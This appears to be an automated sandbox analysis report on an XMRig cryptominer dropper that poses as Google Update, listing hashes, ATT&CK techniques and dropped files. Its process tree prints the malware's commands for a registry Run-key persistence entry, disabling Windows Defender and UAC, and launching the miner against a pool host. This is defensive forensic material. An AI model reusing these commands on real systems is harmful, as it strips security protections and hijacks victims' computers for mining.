xmrig | a38045c3b8a5254c090f89f8908402bfdd436ceeebd1f3fc7f265c8070d320cd

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28/12/2024, 22:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe
Size

6.8MB
MD5

b4b6b67d5e5723248f84cfe8cb022d93
SHA1

e9bc93219af4b2dfc5083db3bc4ec44fdd9ef7f2
SHA256

8884353c745f7c2d7639ec27b31fa8d491283199f4cd0db43eb4eb6eea39b3d7
SHA512

7b5310116fd47c5580ff9d58e23f8009d47763609817292b171379106d5b6532589e21208c115eea923478b019ba9682a056576b255578f7c5f54d0c36786f0b
SSDEEP

196608:5eNb7rBym+IQaK6tmWsCiW/RCWbKSWPX2gZqZT:G1y56EWsvW/iSWPjUZT

Score

10^/10

xmrig discovery evasion miner persistence trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x0009000000023c50-30.dat	family_xmrig
behavioral2/files/0x0009000000023c50-30.dat	xmrig

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe

Cryptocurrency Miner
Makes network request to known mining pool URL.
miner

Executes dropped EXE 1 IoCs

pid	Process
1596	GoogleUpdate.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google Updates = "C:\\Users\\Admin\\AppData\\Roaming\\Google\\GoogleUpdates\\Updates.vbs"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	cmd.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1596	GoogleUpdate.exe
Token: SeLockMemoryPrivilege	1596	GoogleUpdate.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 2412 wrote to memory of 1236	2412	8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe	84
PID 2412 wrote to memory of 1236	2412	8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe	84
PID 2412 wrote to memory of 1236	2412	8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe	84
PID 1236 wrote to memory of 4936	1236	WScript.exe	85
PID 1236 wrote to memory of 4936	1236	WScript.exe	85
PID 1236 wrote to memory of 4936	1236	WScript.exe	85
PID 4936 wrote to memory of 3464	4936	cmd.exe	87
PID 4936 wrote to memory of 3464	4936	cmd.exe	87
PID 4936 wrote to memory of 3464	4936	cmd.exe	87
PID 4936 wrote to memory of 4968	4936	cmd.exe	88
PID 4936 wrote to memory of 4968	4936	cmd.exe	88
PID 4936 wrote to memory of 4968	4936	cmd.exe	88
PID 4968 wrote to memory of 3456	4968	WScript.exe	89
PID 4968 wrote to memory of 3456	4968	WScript.exe	89
PID 4968 wrote to memory of 3456	4968	WScript.exe	89
PID 4936 wrote to memory of 4620	4936	cmd.exe	90
PID 4936 wrote to memory of 4620	4936	cmd.exe	90
PID 4936 wrote to memory of 4620	4936	cmd.exe	90
PID 4936 wrote to memory of 2560	4936	cmd.exe	91
PID 4936 wrote to memory of 2560	4936	cmd.exe	91
PID 4936 wrote to memory of 2560	4936	cmd.exe	91
PID 3456 wrote to memory of 1648	3456	WScript.exe	92
PID 3456 wrote to memory of 1648	3456	WScript.exe	92
PID 3456 wrote to memory of 1648	3456	WScript.exe	92
PID 1648 wrote to memory of 1596	1648	cmd.exe	94
PID 1648 wrote to memory of 1596	1648	cmd.exe	94

C:\Users\Admin\AppData\Local\Temp\8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe
"C:\Users\Admin\AppData\Local\Temp\8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2412
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\install.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.bat" "
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Google Updates" /t REG_SZ /d ""C:\Users\Admin\AppData\Roaming"\Google\GoogleUpdates\Updates.vbs" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:3464
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Google\GoogleUpdates\Updates.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:4968
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Google\GoogleUpdates\start.vbs"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3456
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Google\GoogleUpdates\start.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1648
        
        C:\Users\Admin\AppData\Roaming\Google\GoogleUpdates\GoogleUpdate.exe
        
        GoogleUpdate.exe -o xmr.pool.minergate.com:45700 -u [email protected] -p x --donate-level 1
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4620
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      PID:2560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\GoogleUpdate.exe

Filesize
4.5MB

MD5
31d340053db065837ae9dcfbd8472c38

SHA1
45ba3d64e6c2d50fdb2fa797651e07cd43ecdbdf

SHA256
ddba1495d9a0135403937108e8519d29a2aad060b2f41f00aace994fb0953e8a

SHA512
5fd55d1ff062c0ee1b4e457ebd042edef8e30813c192dd1b15d63805281778183345bf28b9182dc2b5d8982a257ea322bb98b72368898c6ae9ad7f28a5cf6e77

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\OpenCL.dll

Filesize
63KB

MD5
9c70f52eb50eabfb7ff713437a8d9a21

SHA1
edbaeebb72b890f05f295a53ee41cd1c2ecd46ed

SHA256
aaf654c4779bb94adb94819a18ad4e7db9500e4875e1b2e5c24014cef6036625

SHA512
b0bd9d615a2fac19e2782a8d7133fe4fcbd7379c1d958cd7a3318d24843e84eb054d5b7a25818d91f0b2542ccdfb83168be8ca54895f10798f4a23452256e3f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\SHA256SUMS

Filesize
312B

MD5
4d6f38333bd4dff41436e3955164d838

SHA1
7ed8267a2e5516411fe20d573a3d4552535b98af

SHA256
c48e8183618faa397c3fcd4080625c2ce2b41810a611b4f4dfe0a4a54a1f5630

SHA512
54141c8c96b3d7d047491f846071d8b34bb944770c488322cef15df84712c945c9b5c7267c1c702ca099c62365bf276ce6d2eae510417d5e85bd60bed7e6cad9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\WinRing0x64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\install.vbs

Filesize
117B

MD5
77cce38ec5e1fb1dfd444e185be33e55

SHA1
888757f1a9049ecb692283aaece2978374435904

SHA256
35153cd01cd731c2942915cdeb65cdfcfe6327ea2e3effafa60140686b9c9b94

SHA512
59ecd6cacc7cab448e80c10bb2a0e2cbbdae8cc8535ab6cd9afc3d9731be556ede54ad2ab31cdf6724f238bbbfce9fb43b4567dc153ebca66f9d3fa371b1e46d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msvcp140.dll

Filesize
659KB

MD5
89bb632dcbe07cd7aff17440fff46526

SHA1
ee173fe3eca2a0164f63ab1f7bfb5746d56869c0

SHA256
9d770c363f3e20e3ff9bc30aa6c96baff3845a23e12854fd28b63916b5a12ccd

SHA512
87d27b861f2b3c2a0345e71a79dba4b6a8e29a87e73cf689a5f362cfe178bb18767d04fe051a5ecc13e2ec7512a6584a63340af03b87b71312e2b5a2858489ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nvrtc-builtins64_92.dll

Filesize
3.1MB

MD5
79ecdc6585ce79779e4500d4bbca4ac9

SHA1
5ebad0df57b575d0733d2dcaa1bec055566c3c90

SHA256
33b088a56b28194259d276b19c274a88c939bec88ab45ef1f3fdba9717154f53

SHA512
c1f5940143b0ee1c6410163553b1791c00255f9ce994b80ea4672585404806913adce5cc960c568eb5d1b7b8e5dee2b27f0a167972a2ce7a2bf94ed575ead10d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nvrtc64_92.dll

Filesize
14.8MB

MD5
75ce028ba3c02783c002d58941901a84

SHA1
1e24d1954061d24f326d5e3353829f5f2b3c68c7

SHA256
a4a0e8f95006bac4fd1408d75387e30cd3e0c16c821d5b3f96ea0fe0c7de07ab

SHA512
a5bc4478d8c8071499fe8a35a95090f445b98c8a0778565588474d8c8b92992cc2828bc45b665a3af9d9ee1691243fc6426ed4671da4ad13e14b3c53a7470e46

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.bat

Filesize
499B

MD5
6815db83f8df65b269b4413ba9d278a8

SHA1
2eea85805d1ffa6635fd0594754530714855839d

SHA256
ca985d6a6b9fab402e511a5521fc4ec5a61207ea04dd84a75195b8cff8cfc0be

SHA512
97e6d075867649ea924d57cb9a0b72f0ecffadf1746898ed97f75510a8d93876dfa40c4c2fc72c2502d1a16705251ae76d1d70ca69a08a7f2b4e763302b21ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat

Filesize
113B

MD5
c791b2ab794c0f53eb24c43fbb3c1842

SHA1
2e0c383d379b5c0766279b6dbafcc10882743257

SHA256
869b0c15eb404367e0b155b8f89bdd0946581cd7c99cdde1b74dd43fa1e9d5e8

SHA512
39009beebed7ccde612ff7766c65a636b0d362f26db30e1469d33fcf08d42fa9dff0ee652dfea6b84c2008b9da34b1b6f7e2e7bf57c3573904cab3abad6478aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.vbs

Filesize
117B

MD5
8099c67a9631789db03e90d7b7bf0980

SHA1
4fbf9f44825a1184b24a0d957b20a850f3b07c42

SHA256
88a4ed5c8caad58c8eda0d4ed6e36c98ce5b7545529da0cf41ffea4015b71206

SHA512
c2ce0931eed4925e9b808250aa1335e234470571f4e2c95ffc16af972656fb0c3c8b383327d38ec7d1a5d6290e5c6800715b14c0cb93f8ec2092f8e9c3a26043

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\vcruntime140.dll

Filesize
85KB

MD5
5578b8106bc09064343c421d9285ad29

SHA1
1bb17eff7226f103235b68d298afea3a8b27f31f

SHA256
3761dfb440b0e16a69dd69b325beedf4140370a99df242ace415a83b86a34f98

SHA512
f546448d95f80ec46bdd2b92197e55b3d08f78ac55ed3ba5b54337e495b07df56d58239528236c3f2c88c976fa8b34a07453fd35060cc32b299551973f8885a3

Download Submit
C:\Users\Admin\AppData\Roaming\Google\GoogleUpdates\Updates.vbs

Filesize
238B

MD5
36957ecf82ba5bc7d6e30f9a9aad78f2

SHA1
f98dbcfc43d0a6faba7670c1a2f6521ad9d303bc

SHA256
5ad8d5994f0b520b906dd0d912b43459675e61239146e63dbb1790a82ddf5130

SHA512
f70d587abbc9c48d86737a04ac4915af9f29bb2786fe456ed9abcdf1568b5010942e696da4839c39aee588f084a1ded8dde74695907842aa734f5a863525395d

Download Submit
memory/1596-76-0x00000274B2B00000-0x00000274B2B14000-memory.dmp

Filesize
80KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads